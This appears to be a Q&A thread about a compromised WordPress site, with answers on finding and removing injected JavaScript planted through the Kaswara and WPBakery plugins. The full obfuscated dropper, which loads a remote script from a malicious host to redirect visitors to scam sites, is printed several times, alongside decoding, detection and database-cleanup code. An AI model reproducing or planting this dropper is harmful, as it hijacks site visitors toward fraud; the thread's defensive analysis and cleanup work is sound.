
I have come across the issue that one of the WordPress websites I provide maintenance for would strangely redirect the user (unprotected by an AdBlocker) to scam websites.

The redirection has been done through stick.travelinskydream.ga.

On a closer check, a script with the following code had been automatically injected into the application. The following code was used:

var _0x230d=['getElementsByTagName','script','parentNode','279875vBeEEE','head','698448rkGfeF','679597pxmSpW','281314aeWSVS','1fashtG','currentScript','1439788dxeSnm','src','1051197hJyWzE','277011vIvjKc','2vRLkLk','fromCharCode','1YWwfcj'];var _0x3e5356=_0x567b;function _0x567b(_0x4f69c6,_0x44f06a){_0x4f69c6=_0x4f69c6-0x161;var _0x230d0d=_0x230d[_0x4f69c6];return _0x230d0d;}(function(_0x23c6e3,_0x4b8159){var _0x137209=_0x567b;while(!![]){try{var _0x388290=-parseInt(_0x137209(0x168))*parseInt(_0x137209(0x16a))+parseInt(_0x137209(0x16f))+-parseInt(_0x137209(0x165))*-parseInt(_0x137209(0x161))+-parseInt(_0x137209(0x16c))+parseInt(_0x137209(0x167))+parseInt(_0x137209(0x16e))+-parseInt(_0x137209(0x170))*-parseInt(_0x137209(0x169));if(_0x388290===_0x4b8159)break;else _0x23c6e3['push'](_0x23c6e3['shift']());}catch(_0x227ada){_0x23c6e3['push'](_0x23c6e3['shift']());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37),d=document,s=d['createElement'](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm;document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);

It creates a script tag that executes external JS code which redirects the user to malicious websites when it loads. The resulting script tag looks like:

<script src="https://stick.travelinskydreams.ga?Brand.js?vid=0000&pidi=191817&id=53646"></script>

From what I’ve seen, this vulnerability exists within the WPBakery and Kaswara plugins and is a known issue.

https://www.wordfence.com/blog/2020/10/episode-90-wpbakery-plugin-vulnerability-exposes-over-4-million-sites/

https://howtofix.guide/fake-jquery-migrate-plugin/

After deactivating and reactivating plugins one by one, the only two remaining culprits were js_composer (WPBakery) and Kaswara. I have tried updating these two plugins, but the "infection" remained, even though patches have been released for this issue.
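The dropper above is a stock string-array obfuscation: a table of strings, an accessor that subtracts 0x161 from every index, an IIFE that rotates the table until a checksum over its numeric entries equals 0xb70ce, and a String.fromCharCode call that assembles the loader URL from hex char codes. The following is an added analysis example (not code from the question or from any plugin) that emulates exactly those two mechanisms statically, so the DOM calls and the URL can be recovered without executing the sample. The table, index base, checksum expression and char codes are copied from the obfuscated script in the question; nothing is fetched.

```javascript
// Added example: static recovery of the obfuscated dropper's string table and loader URL.
// Everything below is copied from the sample in the question; no network access, no eval.

const STRING_ARRAY = ['getElementsByTagName','script','parentNode','279875vBeEEE','head','698448rkGfeF','679597pxmSpW','281314aeWSVS','1fashtG','currentScript','1439788dxeSnm','src','1051197hJyWzE','277011vIvjKc','2vRLkLk','fromCharCode','1YWwfcj'];
const INDEX_BASE = 0x161;        // _0x567b subtracts this from every lookup index
const CHECKSUM_TARGET = 0xb70ce; // second argument of the rotating IIFE

// The IIFE's checksum, rewritten with plain table positions (hex index minus 0x161).
// parseInt('279875vBeEEE') is 279875; parseInt('script') is NaN, which never matches.
function checksum(arr) {
  const p = (i) => parseInt(arr[i]);
  return -p(7) * p(9) + p(14) + -p(4) * -p(0) + -p(11) + p(6) + p(13) + -p(15) * -p(8);
}

// Rotate a copy of the table one push(shift()) step at a time until the checksum
// matches. Returns the rotated table and the step count, or null if nothing matches
// within one full cycle (the original loop would spin forever in that case).
function rotateUntilMatch(arr, target) {
  const copy = arr.slice();
  for (let steps = 0; steps < copy.length; steps++) {
    if (checksum(copy) === target) return { array: copy, steps };
    copy.push(copy.shift());
  }
  return null;
}

// Resolve an obfuscated accessor call such as _0x3e5356(0x16b) against the rotated table.
function lookup(rotated, hexIndex) {
  return rotated[hexIndex - INDEX_BASE];
}

// Argument list of String[...](...) in the sample: hex char codes of the loader URL.
const CHAR_CODES = [0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37];

function decodeCharCodes(codes) {
  return String.fromCharCode(...codes);
}

// Full static read of the sample: how many rotations the checksum needs, what every
// accessor index outside the IIFE resolves to, and which URL the new <script> loads.
function analyzeSample() {
  const rot = rotateUntilMatch(STRING_ARRAY, CHECKSUM_TARGET);
  if (!rot) throw new Error('no rotation satisfies the checksum');
  const names = {};
  for (const idx of [0x171, 0x163, 0x16d, 0x16b, 0x164, 0x162, 0x166]) {
    names['0x' + idx.toString(16)] = lookup(rot.array, idx);
  }
  return { rotations: rot.steps, names, loaderUrl: decodeCharCodes(CHAR_CODES) };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(analyzeSample(), null, 2));
}
```

Run with node: the table needs 16 rotations, after which 0x171 is `fromCharCode`, 0x163 is `script`, 0x16d is `src`, 0x16b is `currentScript`, 0x164 is `parentNode`, 0x162 is `getElementsByTagName` and 0x166 is `head`, which is exactly the createElement/insertBefore/appendChild sequence the question describes, and the loader URL is the one the answers below match on.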

6 Answers


  1. Chosen as BEST ANSWER

    The resolution was simple enough: after hours, inside the WordPress dashboard, in the Kaswara menu > custom code section, the very code that was presented in the question was there. After deleting it, everything returned to normal.

    It is surely not the only way such malware can destroy work, so I am appending this link with other possible effects.

    https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/

    A potential workaround that worked for me was adding this custom script, which removes the malicious JS after it has loaded (temporary solution; it does not remove the virus):

    // Walk every <script> element on the page; inside .each(), `this` is the current element
    $('script').each(function(index, obj) {
        console.log(index, obj);
        // The remote loader tag: exact src from the decoded payload
        if (obj.src === 'https://stick.travelinskydream.ga/brand.js&v=0032&sid=236&pid=545747') {
            $(this).remove();
            console.log($(this).text());
        }

        // The inline obfuscated dropper, matched verbatim on its text
        if ($(this).text() === "var _0x230d=['getElementsByTagName','script','parentNode','279875vBeEEE','head','698448rkGfeF','679597pxmSpW','281314aeWSVS','1fashtG','currentScript','1439788dxeSnm','src','1051197hJyWzE','277011vIvjKc','2vRLkLk','fromCharCode','1YWwfcj'];var _0x3e5356=_0x567b;function _0x567b(_0x4f69c6,_0x44f06a){_0x4f69c6=_0x4f69c6-0x161;var _0x230d0d=_0x230d[_0x4f69c6];return _0x230d0d;}(function(_0x23c6e3,_0x4b8159){var _0x137209=_0x567b;while(!![]){try{var _0x388290=-parseInt(_0x137209(0x168))*parseInt(_0x137209(0x16a))+parseInt(_0x137209(0x16f))+-parseInt(_0x137209(0x165))*-parseInt(_0x137209(0x161))+-parseInt(_0x137209(0x16c))+parseInt(_0x137209(0x167))+parseInt(_0x137209(0x16e))+-parseInt(_0x137209(0x170))*-parseInt(_0x137209(0x169));if(_0x388290===_0x4b8159)break;else _0x23c6e3['push'](_0x23c6e3['shift']());}catch(_0x227ada){_0x23c6e3['push'](_0x23c6e3['shift']());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37),d=document,s=d['createElement'](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm;document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);") {
            $(this).remove();
        }
    });


    Here is the "beautified" malicious code of the injected JS; maybe it will help someone.

    // String table (not included in the beautified paste; taken from the one-line version in the question)
    var _0x230d = ['getElementsByTagName', 'script', 'parentNode', '279875vBeEEE', 'head', '698448rkGfeF', '679597pxmSpW', '281314aeWSVS', '1fashtG', 'currentScript', '1439788dxeSnm', 'src', '1051197hJyWzE', '277011vIvjKc', '2vRLkLk', 'fromCharCode', '1YWwfcj'];
    var _0x3e5356 = _0x567b;

    // Accessor: every _0x3e5356(0x1xx) call is a lookup into the (rotated) string table
    function _0x567b(_0x4f69c6, _0x44f06a) {
        _0x4f69c6 = _0x4f69c6 - 0x161;
        var _0x230d0d = _0x230d[_0x4f69c6];
        return _0x230d0d;
    }
    // Rotate the table (push(shift())) until a checksum over its numeric entries equals 0xb70ce
    (function(_0x23c6e3, _0x4b8159) {
        var _0x137209 = _0x567b;
        while (!![]) {
            try {
                var _0x388290 = -parseInt(_0x137209(0x168)) * parseInt(_0x137209(0x16a)) + parseInt(_0x137209(0x16f)) + -parseInt(_0x137209(0x165)) * -parseInt(_0x137209(0x161)) + -parseInt(_0x137209(0x16c)) + parseInt(_0x137209(0x167)) + parseInt(_0x137209(0x16e)) + -parseInt(_0x137209(0x170)) * -parseInt(_0x137209(0x169));
                if (_0x388290 === _0x4b8159) break;
                else _0x23c6e3['push'](_0x23c6e3['shift']());
            } catch (_0x227ada) {
                _0x23c6e3['push'](_0x23c6e3['shift']());
            }
        }
    }(_0x230d, 0xb70ce));
    // String.fromCharCode(...) over the char codes below yields the loader URL
    // https://stick.travelinskydream.ga/brand.js&v=0032&sid=236&pid=545747
    var mm = String[_0x3e5356(0x171)](0x68, 0x74, 0x74, 0x70, 0x73, 0x3a, 0x2f, 0x2f, 0x73, 0x74, 0x69, 0x63, 0x6b, 0x2e, 0x74, 0x72, 0x61, 0x76, 0x65, 0x6c, 0x69, 0x6e, 0x73, 0x6b, 0x79, 0x64, 0x72, 0x65, 0x61, 0x6d, 0x2e, 0x67, 0x61, 0x2f, 0x62, 0x72, 0x61, 0x6e, 0x64, 0x2e, 0x6a, 0x73, 0x26, 0x76, 0x3d, 0x30, 0x30, 0x33, 0x32, 0x26, 0x73, 0x69, 0x64, 0x3d, 0x32, 0x33, 0x36, 0x26, 0x70, 0x69, 0x64, 0x3d, 0x35, 0x34, 0x35, 0x37, 0x34, 0x37),
        d = document,
        s = d['createElement'](_0x3e5356(0x163)); // 'script'
    s[_0x3e5356(0x16d)] = mm; // s.src = loader URL
    // Insert the new <script> before the currently running one (document.currentScript),
    // or append it to <head> when currentScript is unavailable
    document[_0x3e5356(0x16b)] ? document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s, document[_0x3e5356(0x16b)]) : d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);
    

    If you find anything else or have been affected by this, please share your solutions!


  2. Just found this option with a BASE64-encoded JS script. Find and delete it.

    Look for this entry in your WP_OPTIONS table.

    What's happening here?

    This malware is JavaScript content which triggers the GET of the travelinski stuff, brand.js.

    Its content is encoded in BASE64 to disrupt its detection by SH or a SELECT query. When invoked into the screen it becomes an executable snippet.

    It may appear under a different option_name, but the content itself must not change that much.

  3. So, for anyone looking for this issue, here is the reason and the solution.

    Reason

    Plugins: the WP-Bakery (JS Composer) and Kaswara plugins are having this issue.

    Solution

    You need to remove one entry from your wp_options table.

    • First login to cPanel.
    • Go to PHPMYADMIN
    • Select the database of your website (which has the issue)
    • Then go to wp_options table.
    • As my friend Andre mentioned, the entry could have a different wp_option_name.
    • You need to enter JS in the Filter Rows input field.
    • It will give you results, now look for option_value that starts with: dmFyIF
    • Delete that entry, and you’re all done.
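    The "dmFyIF" prefix in the step above is simply base64 of "var _", the first five characters of every script produced by this obfuscator ("var _0x..."). The following is an added triage example (not code from either answer or from any plugin) that applies the checks answers 2 and 3 describe to exported wp_options rows: flag a value whose base64 starts with that prefix, decode it, and look for the dropper's markers (fromCharCode, a "var _0x...=[" string table, parseInt). The rows are constructed here; in practice they would come from a `SELECT option_name, option_value FROM wp_options` export, and the option name `kasvaracustomjs` is the one answer 6 gives, used as a sample only since the name may differ.

```javascript
// Added example: triage wp_options values for the base64-encoded JS dropper.
// Rows are constructed below; Buffer is a Node.js global, so this runs offline.

// base64 of "var _" is "dmFyIF": every script from this obfuscator starts with "var _0x".
const DROPPER_PREFIX = Buffer.from('var _').toString('base64').slice(0, 6); // 'dmFyIF'

// Markers present in the decoded dropper from the question (not in normal custom JS).
const MARKERS = [/fromCharCode/, /\bvar _0x[0-9a-f]+\s*=\s*\[/i, /parseInt\(/];

// Decode a value only if it looks like a whole base64 blob (WordPress stores the
// option verbatim, no line wrapping); return null for anything else.
function decodeIfBase64(value) {
  if (!/^[A-Za-z0-9+/]+={0,2}$/.test(value) || value.length % 4 !== 0) return null;
  return Buffer.from(value, 'base64').toString('utf8');
}

// Classify one row: reasons are accumulated so the report says why a row was flagged.
function classifyOption(row) {
  const value = String(row.option_value);
  const decoded = decodeIfBase64(value);
  const reasons = [];
  if (value.startsWith(DROPPER_PREFIX)) reasons.push('base64 of "var _"');
  const text = decoded ?? value;            // also catches a dropper stored unencoded
  for (const m of MARKERS) if (m.test(text)) reasons.push('marker ' + m.source);
  return {
    option_name: row.option_name,
    suspicious: reasons.length > 0,
    reasons,
    preview: text.slice(0, 60),             // enough to eyeball; never executed
  };
}

function findSuspiciousOptions(rows) {
  return rows.map(classifyOption).filter((r) => r.suspicious);
}

// Constructed sample rows. The dropper is a shortened copy of the script in the
// question, base64-encoded here the way answer 2 describes finding it.
const DROPPER_JS = "var _0x230d=['getElementsByTagName','script','parentNode','fromCharCode'];var mm=String['fromCharCode'](0x68,0x74,0x74,0x70,0x73);";
const SAMPLE_ROWS = [
  { option_name: 'siteurl', option_value: 'https://example.com' },
  { option_name: 'kasvaracustomjs', option_value: Buffer.from(DROPPER_JS).toString('base64') },
  { option_name: 'widget_text', option_value: 'aGVsbG8gd29ybGQ=' }, // base64 of "hello world": benign
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(findSuspiciousOptions(SAMPLE_ROWS), null, 2));
}
```

Only the constructed `kasvaracustomjs` row is reported, with both the prefix and the marker reasons; the benign base64 row decodes cleanly and matches nothing, which is the point of decoding before judging rather than deleting every base64-looking value.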
  4. After you clean your site, removing the extra JS in Kaswara, and perform a full scan with Wordfence, then:

    For every Wordfence freemium user who tries to fix this issue before the 21st of May, I suggest:

    In wordfence-waf.php, put these lines just one line after the <?php tag:

    // Temporary WAF rule: refuse the Kaswara 'uploadFontIcon' action outright until the Wordfence update lands
    if(!empty($_GET['action']) && $_GET['action'] == 'uploadFontIcon'){
       die('Good luck');
    }
    

    Then, when you receive the Wordfence update on the 21st of May, revert back to the original.

  5. Thank you very much for this. I had my website infected with this and restored from backup, only to see it reinfected 2 weeks later. Found the DB entry and also saw the script in the custom settings of Kaswara. I’ll see how best I can substitute what I used it for and then delete it.

    Any idea how they got in? Is there an .htaccess directive I can add to block them?

    I found this report and went digging, and found a p.php file uploaded 8 days ago in the Kaswara icons folder /uploads/kaswara/icon/slt

    https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5

  6. After removing the Kaswara plugin, go to MySQL (maybe via phpMyAdmin),
    find the wp_options table and delete the kasvaracustomjs option_name.
